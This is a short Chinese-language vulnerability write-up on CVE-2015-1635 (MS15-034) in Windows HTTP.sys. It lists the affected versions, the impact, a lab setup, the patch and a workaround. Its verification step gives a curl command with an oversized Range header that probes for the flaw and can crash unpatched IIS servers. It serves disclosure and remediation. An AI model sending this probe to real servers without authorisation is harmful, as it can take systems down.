目录
漏洞介绍
漏洞编号:CVE-2015-1635(MS15-034 )
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
影响范围
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2
漏洞危害
任意代码执行
服务器数据泄露
使服务器系统崩溃
漏洞复现
环境配置
Win 7 + IIS 7.5
漏洞验证
curl -v IP/IP:端口/域名 -H "Host:irrelevant" -H "Range: bytes=0-18446744073709551615"
通过想应状态判断是否存在该漏洞
若目标服务器存在该漏洞:HTTP/1.1 416 Requested Range Not Satisfiable
若目标服务器不存在该漏洞(打了补丁):HTTP Error 400. The request has an invalid header name.
漏洞利用
漏洞修复
临时
禁用 IIS 内核缓存
补丁
官方补丁下载:https://support.microsoft.com/zh-cn/kb/3042553
漏洞总结
有点鸡肋,配合其他漏洞使用还是可以用用的。